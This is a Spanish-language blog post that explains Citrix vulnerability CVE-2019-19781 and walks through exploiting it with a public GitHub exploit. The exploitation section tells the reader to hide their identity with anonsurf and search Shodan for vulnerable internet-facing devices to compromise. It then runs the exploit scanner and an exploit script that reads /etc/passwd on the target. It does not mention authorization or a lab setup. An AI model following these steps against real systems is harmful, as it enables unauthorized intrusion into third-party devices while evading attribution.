Juan David Cardona

Juan David Cardona

Ingeniero de sistemas / Especialista en seguridad informatica / Máster en Ciberseguridad

Explotación de CVE-2019-19781 - Vulnerabilidades

Descripción:

La vulnerabilidad CVE-2019-19781 corresponde con un ataque de directorio transversal que permitía a un atacante ejecutar de forma remota código arbitrario en varias versiones de los productos ADC y Gateway de Citrix, así como en versiones antiguas de Citrix SD-WAN WANOP.

Está valorada como crítica, con una puntuación de 9.8 y fue descubierta por el investigador Mikhail Klyuchnikov, trabajador de la empresa Positive Technologies, quien reportó de manera ética la incidencia siguiendo el procedimiento de publicación responsable aplicable en estos casos.

• Tipo: Limitación incorrecta de nombre de ruta a un directorio restringido (Path Traversal)

• Gravedad: Alta

• Fecha publicación: 27/12/2019

• Última modificación: 08/01/2020

Productos Afectados:

• Citrix ADC y Citrix Gateway versión 13.0 todas las compilaciones compatibles

• Citrix ADC y NetScaler Gateway versión 12.1 todas las compilaciones compatibles

• Citrix ADC y NetScaler Gateway versión 12.0 todas las compilaciones compatibles

• Citrix ADC y NetScaler Gateway versión 11.1 todas las compilaciones compatibles

• Citrix NetScaler ADC y NetScaler Gateway versión 10.5 todas las compilaciones compatibles

Explotación:

Para esta explotaciòn vamos a utilizar una maquina con sistema operativo Kali Linux. Como primera medida vamos a iniciar el anunsurf para manejar el anonimato

• Anonsurf start

Buscamos en la página Expoit Database, un exploit referente a la vulnerabilidad.

• https://www.exploit-db.com/

En la página de Shodan buscamos equipos con esta vulnerabilidad para ser vulnerados.

• https://www.shodan.io/

Se realiza la clonación del repositorio del exploit desde la página de GitHub.

• Git clone https://github.com/projectzeroindia/CVE-2019-19781

Ingresamos al directorio del Exploit descargado.

Dentro del directorio ejecutamos el siguiente comando.

• python3 cve-2019-19781_scanner.py

Finalmente se evidencia que fue vulnerable y lista los directorios del dispositivo.

Probamos ejecutando otro comando.

• bash CVE-2019-19781.sh 'cat /etc/passwd'

Referencias:

• https://nvd.nist.gov/vuln/detail/CVE-2019-19781

• https://support.citrix.com/article/CTX267679

• https://www.exploit-db.com/exploits/47913